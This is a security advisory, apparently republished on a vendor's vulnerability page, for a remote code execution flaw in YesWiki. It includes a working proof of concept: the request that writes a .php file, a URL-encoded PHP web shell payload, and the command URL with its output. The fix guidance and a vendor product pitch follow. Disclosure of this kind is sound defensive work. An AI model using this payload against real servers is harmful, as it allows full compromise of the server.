GHSA-88xg-v53p-fpvf
YesWiki Remote Code Execution via Arbitrary PHP File Write and Execution
EPSS Exploitation Probability
EPSS (Exploit Prediction Scoring System) is a daily probability model maintained by FIRST.org. It estimates the likelihood a CVE will be exploited in production environments within the next 30 days, derived from real-world threat intelligence signals.
Blast Radius
yeswiki/yeswikiReal-time download stats are indexed for npm and PyPI packages. This vulnerability affects Packagist packages — download data is not available via public APIs for these ecosystems.
Description
Summary
An arbitrary file write can be used to write a file with a PHP extension, which then can be browsed to in order to execute arbitrary code on the server.
All testing was performed on a local docker setup running the latest version of the application.
PoC
Proof of Concept
Navigate to http://localhost:8085/?LookWiki which allows you to click Create a new Graphical configuration where you specify some parameters and then click Save.
After clicking save, this request is made (most headers removed for clarity):
POST /?api/templates/custom-presets/test.css HTTP/1.1
Host: localhost:8085
primary-color=%230c5d6a&secondary-color-1=%23d8604c&secondary-color-2=%23d78958&neutral-color=%234e5056&neutral-soft-color=%2357575c&neutral-light-color=%23f2f2f2&main-text-fontsize=17px&main-text-fontfamily=%22Nunito%22%2C+sans-serif&main-title-fontfamily='Nunito'%2C+sans-serif
This request writes the file test.css to disk with the contents (abbreviated)
:root {
--primary-color: #0c5d6a;
--secondary-color-1: #d8604c;
--secondary-color-2: #d78958;
--neutral-color: #4e5056;
--neutral-soft-color: #57575c;
--neutral-light-color: #f2f2f2;
--main-text-fontsize: 17px;
--main-text-fontfamily: "Nunito", sans-serif;
--main-title-fontfamily: 'Nunito', sans-serif;
}
To exploit this, utilize a proxy tool to intercept the the first request and change the filename extension to .php and add arbitrary PHP code in for one of the request body parameters.
e.g. primary-color=%3C%3Fphp+system%28%24_GET%5B%27cmd%27%5D%29%3B+%3F%3E
Now the file pizzapower.php is written to /var/www/html/custom/css-presets/pizzapower.php and it starts with this, where the PHP code is present.
:root {
--primary-color: <?php system($_GET['cmd']); ?>;
--secondary-color-1: #d8604c;
--secondary-color-2: #d78958;
--neutral-color: #4e5056;
--neutral-soft-color: #57575c;
--neutral-light-color: #f2f2f2;
--main-text-fontsize: 17px;
--main-text-fontfamily: "Nunito", sans-serif;
--main-title-fontfamily: 'Nunito', sans-serif;
}
Then, simply visit the file with a cmd parameter included.
http://localhost:8085/custom/css-presets/pizzapower.php?cmd=id
And the HTTP response will contain the output of our command. Notably this request can be performed unauthenticated (the creation of the file requires auth, though).
:root {
--primary-color: uid=501(yeswiki) gid=501 groups=501
;
--secondary-color-1: #d8604c;
--secondary-color-2: #d78958;
--neutral-color: #4e5056;
--neutral-soft-color: #57575c;
--neutral-light-color: #f2f2f2;
--main-text-fontsize: 17px;
--main-text-fontfamily: "Nunito", sans-serif;
--main-title-fontfamily: 'Nunito', sans-serif;
}
Impact
Full compromise of the server. Can potentially be performed unwittingly by a user subjected to the previously reported (or future) XSS vulnerabilities.
Fixes
Amongst others:
Restrict file extensions: Only allow a safelist of extensions (e.g., .css) when saving files via this feature. Harden server config: Disable PHP execution in user-writable directories
Affected Packages
| Ecosystem | Package | Vulnerable range | Fix |
|---|---|---|---|
| 🐘Packagist | yeswiki/yeswiki | all versions | 4.5.4 |
Detection & mitigation playbook
Open-source dependencyDetect
Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for yeswiki/yeswiki. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.
Fix
Update yeswiki/yeswiki to 4.5.4 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-88xg-v53p-fpvf is resolved across your whole dependency graph.
Workarounds
If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.
How O3 protects you
O3 pinpoints whether GHSA-88xg-v53p-fpvf is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.
Tailored to GHSA-88xg-v53p-fpvf. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.
Frequently Asked Questions
Is GHSA-88xg-v53p-fpvf in your dependencies?
O3 detects GHSA-88xg-v53p-fpvf across Packagist dependencies and uses function-level reachability to confirm whether the vulnerable code path is actually reachable — not just present. No false positives.